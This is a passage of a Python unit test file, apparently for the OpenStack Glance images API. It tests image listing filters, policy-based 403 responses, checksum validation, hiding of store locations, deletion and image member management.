'active', + 'is_public': True, + 'disk_format': 'ami', + 'container_format': 'ami', + 'name': 'fake image #4', + 'size': 20, + 'checksum': None, + 'created_at': image_ts, + 'updated_at': image_ts} + + db_api.image_create(self.context, extra_fixture) + + # Check a standard list, 4 images in db (2 deleted) + req = webob.Request.blank('/images/detail') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 2) + self.assertEqual(images[0]['id'], UUID4) + self.assertEqual(images[1]['id'], UUID2) + + # Expect 3 images (1 deleted) + req = webob.Request.blank('/images/detail?changes-since=%s' % iso1) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 3) + self.assertEqual(images[0]['id'], UUID4) + self.assertEqual(images[1]['id'], UUID3) # deleted + self.assertEqual(images[2]['id'], UUID2) + + # Expect 1 images (0 deleted) + req = webob.Request.blank('/images/detail?changes-since=%s' % iso2) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 1) + self.assertEqual(images[0]['id'], UUID4) + + # Expect 1 images (0 deleted) + req = webob.Request.blank('/images/detail?changes-since=%s' % + hour_before) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 1) + self.assertEqual(images[0]['id'], UUID4) + + # Expect 0 images (0 deleted) + req = webob.Request.blank('/images/detail?changes-since=%s' % + hour_after) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 0) + + # Expect 0 images (0 deleted) + req = webob.Request.blank('/images/detail?changes-since=%s' % iso4) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 0) + + for param in [date_only1, date_only2, date_only3]: + # Expect 3 images (1 deleted) + req = webob.Request.blank('/images/detail?changes-since=%s' % + param) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 3) + self.assertEqual(images[0]['id'], UUID4) + self.assertEqual(images[1]['id'], UUID3) # deleted + self.assertEqual(images[2]['id'], UUID2) + + # Bad request (empty changes-since param) + req = webob.Request.blank('/images/detail?changes-since=') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_get_images_bad_urls(self): + """"""Check that routes collections are not on (LP bug 1185828)"""""" + req = webob.Request.blank('/images/detail.xxx') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + req = webob.Request.blank('/images.xxx') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + req = webob.Request.blank('/images/new') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + req = webob.Request.blank(""/images/%s/members"" % UUID1) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank(""/images/%s/members.xxx"" % UUID1) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + def test_get_images_detailed_unauthorized(self): + rules = {""get_images"": '!'} + self.set_policy_rules(rules) + req = webob.Request.blank('/images/detail') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_get_images_unauthorized(self): + rules = {""get_images"": '!'} + self.set_policy_rules(rules) + req = webob.Request.blank('/images/detail') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_store_location_not_revealed(self): + """""" + Test that the internal store location is NOT revealed + through the API server + """""" + # Check index and details... + for url in ('/images', '/images/detail'): + req = webob.Request.blank(url) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + + images = res_dict['images'] + num_locations = sum([1 for record in images + if 'location' in record.keys()]) + self.assertEquals(0, num_locations, images) + + # Check GET + req = webob.Request.blank(""/images/%s"" % UUID2) + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertFalse('X-Image-Meta-Location' in res.headers) + + # Check HEAD + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertFalse('X-Image-Meta-Location' in res.headers) + + # Check PUT + req = webob.Request.blank(""/images/%s"" % UUID2) + req.body = res.body + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + res_body = json.loads(res.body) + self.assertFalse('location' in res_body['image']) + + # Check POST + req = webob.Request.blank(""/images"") + headers = {'x-image-meta-location': 'http://localhost', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + for k, v in headers.iteritems(): + req.headers[k] = v + req.method = 'POST' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 201) + res_body = json.loads(res.body) + self.assertFalse('location' in res_body['image']) + + def test_image_is_checksummed(self): + """"""Test that the image contents are checksummed properly"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + image_contents = ""chunk00000remainder"" + image_checksum = hashlib.md5(image_contents).hexdigest() + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = image_contents + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals(image_checksum, res_body['checksum'], + ""Mismatched checksum. Expected %s, got %s"" % + (image_checksum, res_body['checksum'])) + + def test_etag_equals_checksum_header(self): + """"""Test that the ETag header matches the x-image-meta-checksum"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + image_contents = ""chunk00000remainder"" + image_checksum = hashlib.md5(image_contents).hexdigest() + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = image_contents + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + image = json.loads(res.body)['image'] + + # HEAD the image and check the ETag equals the checksum header... + expected_headers = {'x-image-meta-checksum': image_checksum, + 'etag': image_checksum} + req = webob.Request.blank(""/images/%s"" % image['id']) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + for key in expected_headers.keys(): + self.assertTrue(key in res.headers, + ""required header '%s' missing from "" + ""returned headers"" % key) + for key, value in expected_headers.iteritems(): + self.assertEquals(value, res.headers[key]) + + def test_bad_checksum_prevents_image_creation(self): + """"""Test that the image contents are checksummed properly"""""" + image_contents = ""chunk00000remainder"" + bad_checksum = hashlib.md5(""invalid"").hexdigest() + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-checksum': bad_checksum, + 'x-image-meta-is-public': 'true'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = image_contents + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + # Test that only one image was returned (that already exists) + req = webob.Request.blank(""/images"") + req.method = 'GET' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + images = json.loads(res.body)['images'] + self.assertEqual(len(images), 1) + + def test_image_meta(self): + """"""Test for HEAD /images/"""""" + expected_headers = {'x-image-meta-id': UUID2, + 'x-image-meta-name': 'fake image #2'} + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + for key, value in expected_headers.iteritems(): + self.assertEquals(value, res.headers[key]) + + def test_image_meta_unauthorized(self): + rules = {""get_image"": '!'} + self.set_policy_rules(rules) + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_show_image_basic(self): + req = webob.Request.blank(""/images/%s"" % UUID2) + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertEqual(res.content_type, 'application/octet-stream') + self.assertEqual('chunk00000remainder', res.body) + + def test_show_non_exists_image(self): + req = webob.Request.blank(""/images/%s"" % _gen_uuid()) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + def test_show_image_unauthorized(self): + rules = {""get_image"": '!'} + self.set_policy_rules(rules) + req = webob.Request.blank(""/images/%s"" % UUID2) + res = req.get_response(self.api) + self.assertEqual(res.status_int, 403) + + def test_show_image_unauthorized_download(self): + rules = {""download_image"": '!'} + self.set_policy_rules(rules) + req = webob.Request.blank(""/images/%s"" % UUID2) + res = req.get_response(self.api) + self.assertEqual(res.status_int, 403) + + def test_delete_image(self): + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEquals(res.body, '') + + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'GET' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404, + res.body) + + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEquals(res.headers['x-image-meta-deleted'], 'True') + self.assertEquals(res.headers['x-image-meta-status'], 'deleted') + + def test_delete_non_exists_image(self): + req = webob.Request.blank(""/images/%s"" % _gen_uuid()) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + def test_delete_not_allowed(self): + # Verify we can get the image data + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'GET' + req.headers['X-Auth-Token'] = 'user:tenant:' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertEqual(len(res.body), 19) + + # Verify we cannot delete the image + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 403) + + # Verify the image data is still there + req.method = 'GET' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertEqual(len(res.body), 19) + + def test_delete_queued_image(self): + """"""Delete an image in a queued state + + Bug #747799 demonstrated that trying to DELETE an image + that had had its save process killed manually results in failure + because the location attribute is None. + + Bug #1048851 demonstrated that the status was not properly + being updated to 'deleted' from 'queued'. + """""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals('queued', res_body['status']) + + # Now try to delete the image... + req = webob.Request.blank(""/images/%s"" % res_body['id']) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank('/images/%s' % res_body['id']) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEquals(res.headers['x-image-meta-deleted'], 'True') + self.assertEquals(res.headers['x-image-meta-status'], 'deleted') + + def test_delete_queued_image_delayed_delete(self): + """"""Delete an image in a queued state when delayed_delete is on + + Bug #1048851 demonstrated that the status was not properly + being updated to 'deleted' from 'queued'. + """""" + self.config(delayed_delete=True) + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals('queued', res_body['status']) + + # Now try to delete the image... + req = webob.Request.blank(""/images/%s"" % res_body['id']) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank('/images/%s' % res_body['id']) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEquals(res.headers['x-image-meta-deleted'], 'True') + self.assertEquals(res.headers['x-image-meta-status'], 'deleted') + + def test_delete_protected_image(self): + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-protected': 'True'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals('queued', res_body['status']) + + # Now try to delete the image... + req = webob.Request.blank(""/images/%s"" % res_body['id']) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_delete_image_unauthorized(self): + rules = {""delete_image"": '!'} + self.set_policy_rules(rules) + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_get_details_invalid_marker(self): + """""" + Tests that the /images/detail registry API returns a 400 + when an invalid marker is provided + """""" + req = webob.Request.blank('/images/detail?marker=%s' % _gen_uuid()) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_get_image_members(self): + """""" + Tests members listing for existing images + """""" + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'GET' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + memb_list = json.loads(res.body) + num_members = len(memb_list['members']) + self.assertEquals(num_members, 0) + + def test_get_image_members_allowed_by_policy(self): + rules = {""get_members"": '@'} + self.set_policy_rules(rules) + + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'GET' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + memb_list = json.loads(res.body) + num_members = len(memb_list['members']) + self.assertEquals(num_members, 0) + + def test_get_image_members_forbidden_by_policy(self): + rules = {""get_members"": '!'} + self.set_policy_rules(rules) + + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'GET' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code) + + def test_get_image_members_not_existing(self): + """""" + Tests proper exception is raised if attempt to get members of + non-existing image + """""" + req = webob.Request.blank('/images/%s/members' % _gen_uuid()) + req.method = 'GET' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + def test_add_member(self): + """""" + Tests adding image members + """""" + test_router_api = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router_api, is_admin=True) + req = webob.Request.blank('/images/%s/members/test' % UUID2) + req.method = 'PUT' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + def test_get_member_images(self): + """""" + Tests image listing for members + """""" + req = webob.Request.blank('/shared-images/pattieblack') + req.method = 'GET' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + memb_list = json.loads(res.body) + num_members = len(memb_list['shared_images']) + self.assertEquals(num_members, 0) + + def test_replace_members(self): + """""" + Tests replacing image members raises right exception + """""" + test_router_api = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router_api, is_admin=False) + fixture = dict(member_id='pattieblack') + + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(image_memberships=fixture)) + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 401) + + def test_active_image_immutable_props_for_user(self): + """""" + Tests user cannot update immutable props of active image + """""" + test_router_api = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router_api, is_admin=False) + fixture_header_list = [{'x-image-meta-checksum': '1234'}, + {'x-image-meta-size': '12345'}] + for fixture_header in fixture_header_list: + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'PUT' + for k, v in fixture_header.iteritems(): + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + orig_value = res.headers[k] + + req = webob.Request.blank('/images/%s' % UUID2) + req.headers[k] = v + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + prop = k[len('x-image-meta-'):] + self.assertNotEqual(res.body.find(""Forbidden to modify \'%s\' "" + ""of active "" + ""image"" % prop), -1) + + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEquals(orig_value, res.headers[k]) + + def test_props_of_active_image_mutable_for_admin(self): + """""" + Tests admin can update 'immutable' props of active image + """""" + test_router_api = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router_api, is_admin=True) + fixture_header_list = [{'x-image-meta-checksum': '1234'}, + {'x-image-meta-size': '12345'}] + for fixture_header in fixture_header_list: + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'PUT' + for k, v in fixture_header.iteritems(): + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + orig_value = res.headers[k] + + req = webob.Request.blank('/images/%s' % UUID2) + req.headers[k] = v + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEquals(v, res.headers[k]) + + def test_replace_members_non_existing_image(self): + """""" + Tests replacing image members raises right exception + """""" + test_router_api = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router_api, is_admin=True) + fixture = dict(member_id='pattieblack') + req = webob.Request.blank('/images/%s/members' % _gen_uuid()) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(image_memberships=fixture)) + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + def test_replace_members_bad_request(self): + """""" + Tests replacing image members raises bad request if body is wrong + """""" + test_router_api = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router_api, is_admin=True) + fixture = dict(member_id='pattieblack') + + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(image_memberships=fixture)) + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_replace_members_positive(self): + """""" + Tests replacing image members + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router, is_admin=True) + + fixture = [dict(member_id='pattieblack', can_share=False)] + # Replace + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(memberships=fixture)) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 204) + + def test_replace_members_forbidden_by_policy(self): + rules = {""modify_member"": '!'} + self.set_policy_rules(rules) + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper), + is_admin=True) + fixture = [{'member_id': 'pattieblack', 'can_share': 'false'}] + + req = webob.Request.blank('/images/%s/members' % UUID1) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(memberships=fixture)) + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code) + + def test_replace_members_allowed_by_policy(self): + rules = {""modify_member"": '@'} + self.set_policy_rules(rules) + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper), + is_admin=True) + fixture = [{'member_id': 'pattieblack', 'can_share': 'false'}] + + req = webob.Request.blank('/images/%s/members' % UUID1) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(memberships=fixture)) + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code) + + def test_add_member(self): + """""" + Tests adding image members raises right exception + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router, is_admin=False) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 401) + + def test_add_member_non_existing_image(self): + """""" + Tests adding image members raises right exception + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router, is_admin=True) + test_uri = '/images/%s/members/pattieblack' + req = webob.Request.blank(test_uri % _gen_uuid()) + req.method = 'PUT' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + def test_add_member_positive(self): + """""" + Tests adding image members + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router, is_admin=True) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 204) + + def test_add_member_with_body(self): + """""" + Tests adding image members + """""" + fixture = dict(can_share=True) + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router, is_admin=True) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + req.body = json.dumps(dict(member=fixture)) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 204) + + def test_add_member_forbidden_by_policy(self): + rules = {""modify_member"": '!'} + self.set_policy_rules(rules) + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper), + is_admin=True) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID1) + req.method = 'PUT' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code) + + def test_add_member_allowed_by_policy(self): + rules = {""modify_member"": '@'} + self.set_policy_rules(rules) + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper), + is_admin=True) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID1) + req.method = 'PUT' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code) + + def test_get_members_of_deleted_image_raises_404(self): + """""" + Tests members listing for deleted image raises 404. + """""" + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'GET' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code) + self.assertTrue( + 'Image with identifier %s has been deleted.' % UUID2 in res.body) + + def test_delete_member_of_deleted_image_raises_404(self): + """""" + Tests deleting members of deleted image raises 404. + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True) + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'DELETE' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code) + self.assertTrue( + 'Image with identifier %s has been deleted.' % UUID2 in res.body) + + def test_update_members_of_deleted_image_raises_404(self): + """""" + Tests update members of deleted image raises 404. + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True) + + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 204) + + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + fixture = [{'member_id': 'pattieblack', 'can_share': 'false'}] + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(memberships=fixture)) + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code) + self.assertTrue( + 'Image with identifier %s has been deleted.' % UUID2 in res.body) + + def test_create_member_to_deleted_image_raises_404(self): + """""" + Tests adding members to deleted image raises 404. + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True) + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code) + self.assertTrue( + 'Image with identifier %s has been deleted.' % UUID2 in res.body) + + def test_delete_member(self): + """""" + Tests deleting image members raises right exception + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router, is_admin=False) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'DELETE' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 401) + + def test_delete_member_on_non_existing_image(self): + """""" + Tests deleting image members raises right exception + """""" + test_router = router.API(self.mapper) + api = test_utils.FakeAuthMiddleware(test_router, is_admin=True) + test_uri = '/images/%s/members/pattieblack' + req = webob.Request.blank(test_uri % _gen_uuid()) + req.method = 'DELETE' + + res = req.get_response(api) + self.assertEquals(res.status_int, 404) + + def test_delete_non_exist_member(self): + """""" + Test deleting image members raises right exception + """""" + test_router = router.API(self.mapper) + api = test_utils.FakeAuthMiddleware( + test_router, is_admin=True) + req = webob.Request.blank('/images/%s/members/test_user' % UUID2) + req.method = 'DELETE' + res = req.get_response(api) + self.assertEquals(res.status_int, 404) + + def test_delete_image_member(self): + test_rserver = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_rserver, is_admin=True) + + # Add member to image: + fixture = dict(can_share=True) + test_uri = '/images/%s/members/test_add_member_positive' + req = webob.Request.blank(test_uri % UUID2) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(member=fixture)) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 204) + + # Delete member + test_uri = '/images/%s/members/test_add_member_positive' + req = webob.Request.blank(test_uri % UUID2) + req.headers['X-Auth-Token'] = 'test1:test1:' + req.method = 'DELETE' + req.content_type = 'application/json' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + self.assertTrue('Forbidden' in res.body) + + def test_delete_member_allowed_by_policy(self): + rules = {""delete_member"": '@', ""modify_member"": '@'} + self.set_policy_rules(rules) + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper), + is_admin=True) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code) + + def test_delete_member_forbidden_by_policy(self): + rules = {""delete_member"": '!', ""modify_member"": '@'} + self.set_policy_rules(rules) + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper), + is_admin=True) + req = webob.Request.blank('/images/%s/members/pattieblack' % UUID2) + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code) + + +class TestImageSerializer(base.IsolatedUnitTest): + def setUp(self): + """"""Establish a clean test environment"""""" + super(TestImageSerializer, self).setUp() + self.receiving_user = 'fake_user' + self.receiving_tenant = 2 + self.context = glance.context.RequestContext( + is_admin=True, + user=self.receiving_user, + tenant=self.receiving_tenant) + self.serializer = images.ImageSerializer() + + def image_iter(): + for x in ['chunk', '678911234', '56789']: + yield x + + self.FIXTURE = { + 'image_iterator': image_iter(), + 'image_meta': { + 'id': UUID2, + 'name': 'fake image #2', + 'status': 'active', + 'disk_format': 'vhd', + 'container_format': 'ovf', + 'is_public': True, + 'created_at': timeutils.utcnow(), + 'updated_at': timeutils.utcnow(), + 'deleted_at': None, + 'deleted': False, + 'checksum': 'PI:KEY', + 'size': 19, + 'owner': _gen_uuid(), + 'location': ""file:///tmp/glance-tests/2"", + 'properties': {}, + } + } + + def test_meta(self): + exp_headers = {'x-image-meta-id': UUID2, + 'x-image-meta-location': 'file:///tmp/glance-tests/2', + 'ETag': self.FIXTURE['image_meta']['checksum'], + 'x-image-meta-name': 'fake image #2'} + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + req.remote_addr = ""127.0.0.1"" + req.context = self.context + response = webob.Response(request=req) + self.serializer.meta(response, self.FIXTURE) + for key, value in exp_headers.iteritems(): + self.assertEquals(value, response.headers[key]) + + def test_meta_utf8(self): + # We get unicode strings from JSON, and therefore all strings in the + # metadata will actually be unicode when handled internally. But we + # want to output utf-8. + FIXTURE = { + 'image_meta': { + 'id': unicode(UUID2), + 'name': u'fake image #2 with utf-8 éàè', + 'status': u'active', + 'disk_format': u'vhd', + 'container_format': u'ovf', + 'is_public': True, + 'created_at': timeutils.utcnow(), + 'updated_at': timeutils.utcnow(), + 'deleted_at': None, + 'deleted': False, + 'checksum': u'PI:KEY', + 'size': 19, + 'owner': unicode(_gen_uuid()), + 'location': u""file:///tmp/glance-tests/2"", + 'properties': { + u'prop_éé': u'ça marche', + u'prop_çé': u'çé', + } + } + } + exp_headers = {'x-image-meta-id': UUID2.encode('utf-8'), + 'x-image-meta-location': 'file:///tmp/glance-tests/2', + 'ETag': 'PI:KEY', + 'x-image-meta-size': '19', # str, not int + 'x-image-meta-name': 'fake image #2 with utf-8 éàè', + 'x-image-meta-property-prop_éé': 'ça marche', + 'x-image-meta-property-prop_çé': u'çé'.encode('utf-8')} + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + req.remote_addr = ""127.0.0.1"" + req.context = 